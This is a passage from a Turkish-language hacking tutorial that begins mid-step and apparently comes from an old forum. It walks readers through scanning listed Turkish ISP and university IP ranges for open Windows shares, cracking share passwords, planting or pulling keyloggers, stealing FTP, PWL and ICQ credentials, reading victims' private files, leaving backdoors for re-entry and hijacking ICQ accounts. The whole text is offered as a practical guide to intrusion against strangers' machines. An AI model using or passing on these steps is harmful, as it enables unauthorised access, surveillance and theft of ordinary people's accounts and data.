tamam deyin.Ve scan from yazan yere istedigimiz ip numarasini
yazalim to yazan yere ikinci ip yi yazalim (burada iki ip numarasi
arasindaki açiklari olan bilgisayari gösterir)bu arada benden size
kiyak asagida en çok kullandigim ip araliklarini yazdim.Evet scana
basmistik simdi arama bittikten sonra açik bilgisayarlar
listelenmistir.
3-Bu arada program 2000 NT ve Linux larda
çalismiyor.Evet simdi çikan bilgisayarlardan birinin üstünde sag
tiklayin ve gather intelligence yi tiklayin bu islem size
bilgisayarin açik olan klasörlerini gösterir.Evet olurda sizden
sifre isterse hemen sag tiklayin ve Crack Password(win9x) yazan yere
tiklayin bu sekilde sifreyi kirar sizde kirdigi sifreyi sifre
penceresine yazin ve devam edin.
4-Simdi bilgisayar elinizde
sayilir.Simdide Hallet'i açin ipi yazan yere açik buldugunuz ip
numarasini yazin ben sirasiyla sunlari yapiyorumm ama siz
istediginizi yapabilirsiniz.Ilk basta key log butonuna basin size
iki sik çikar bir keylog gönder iki keylog indir istediginizi
yapin.(Bu arada keylogun görevi bir bilgisayarin açilisindan
kapanisina kadar ne yaptiysa hangi programi çalistirdiysa ne
yazdiysa onu kaydetmek).Ikinci olarak ftp butonuna tiklayin size o
bilgisayarda bulunan ftp sifrelerini yollar bunu çalistirmak için
yollanan dosyayi alin ve hangi ftp programini kullaniyosaniz onun
içine atin bu sekilde sitesinide ele geçirirsiniz.Üçüncü olarak Pwl
indir butonuna tiklayin size karsi bilgisayarin pwl dosyalarini
aninda kopyalar(Pwl dosyasinin içinde kisinin internet hesaplarinin
sifresi bulunur)evet buda tamam.Pwl kirmayi biraz sonra
anlaticam.Simdi de görüntülenecek dizininde program files yazisini
silin isterseniz dursun ama eger silerseniz direk c ye
girersiniz.Evet simdide isterseniz belgelerim yazan yere tiklayarak
kisinin özel dosyalarina ulasabilirsiniz.Sirada program files girin
adamin icq su varmi bakin varsa çift tiklayin.Buradanda kullandigi
versiyonun adi olan dizine (2000b, 2001a, 2001b vs.) girin ve içinde
icqnumarasi.dat dosyasini kopyalayin ve kendi bilgisayariniza
atin.Iste bu kadar artik kopabilirsiniz tabi isiniz bittiyse bana bu
kadar yeterli.Bu arada çikmadan önce bilgisayara masaüstüne veya
start-up'ina trojan veya diger backdoorlari birakirsaniz daha sonra
tekrar girebilmeniz için açik kapi birakmis olursunuz.
5-Simdide pwl yi kiralim repwl dosyasini çalistirin browse
yazan yere tiklayin ve karsi taraftan kopyalanan pwl dosyasinin
yerini belirtin(eger hallet le indirdiyseniz hallet klasörünün içine
atar).Simdide CheckPass'a tiklayin size kullanicinin internet
sifresini ve kullanici adini verir tepe tepe kullanin
6-Simdide icq yu kiralim icqrin 'i çalistirin simdi alttaki
Open Databese butonuna tiklayin ve kopyaladiginiz icq dat dosyasinin
yerini belirtin simdide sol taraftaki sekmelerden internet sekmesine
tiklayin iste bu kadar adamin icq sifresi karsinizda simdide sifreyi
degistirin dilediginiz gibi kullanin.
Not:Eger
bilgisayariniz yavaslarsa kitlenmis zandedebilirsiniz ama
beklerseniz istediginiz sey açilir.Genelde ttnet ve bulundugunuz
ildeki ip araliklarini tercih edin hizli oluyor birde eger
bilgisyarinizda NetBEUI protokolu yoksa yükleyin, yoksa
arattiginizda makinalari görür ama makinaya giremezsiniz.(Bu
protokol yoksa ve yüklemek istiyorsaniz : Denetim Masasi > Ag
> Ekle > Iletisim Kurallari > Microsoft NetBEUI i secin.Ok
diyin)
IP ARALIKLARI:
195.174.96.0 - 195.174.127.255
- TTnet 212.253.0.0 - 212.253.255.255 - Superonline
213.204.64.0 - 213.204.88.255 - YIMPASNET 195.174.96.0 -
195.174.127.255 - Ultranet (kablo) 213.194.96.0 - 213.194.99.255
- TR-BNET 212.174.0.0 - 212.175.255.255 - TR-TELEKOM-990407
195.87.153.0 - 195.87.153.255 - KOCNET-NETWORK 195.174.0.0 -
195.175.255.255 - TR-TELEKOM-960902 212.29.107.0 -
212.29.127.255 - VESTELNET 62.29.0.0 - 62.29.127.255 -
TR-DOGAN-20000427 144.122.0.0 - 144.122.255.255 - METU-NET
62.248.32.0 - 62.248.47.255 - KABLONET 212.64.192.0 -
212.64.223.255 - TR-ATLAS-990420 217.164.0.0 - 217.165.255.255 -
AE-EMIRNET-20010405 212.103.160.0 - 212.103.166.255 - GEGANETNET
213.254.128.0 - 213.254.148.255 - DEKSAR (Barracuda)
213.153.211.0 - 213.153.215.255 - TNN-NET1 (turk net)
194.27.48.0 - 194.27.49.255 - TRATAUNI-NET (ulak net)
62.85.129.0 - 62.85.129.255 - RTNET-CYPOP-2 (rt net)
217.131.0.0 - 217.131.255.255 - TR-SUPERONLINE-980319
213.14.57.0 - 213.14.72.255 - VESTELNET 213.43.129.0 -
213.43.255.255 - IXIR 193.140.40.0 - 193.140.47.255 - DAU-NET
213.243.0.0 - 213.243.15.255 - DOL 212.58.0.0 -
212.58.15.255 - DORUKNET 193.192.98.0 - 193.192.118.255 -
NETONE-NET 213.153.251.0 - 213.153.255.255 - TNN-NET1
212.146.128.0 - 212.146.175.255 - ANET 212.174.242.0 -
212.174.243.255 - KAYNET 212.175.244.0 - 212.175.245.255 -
MAYANET
|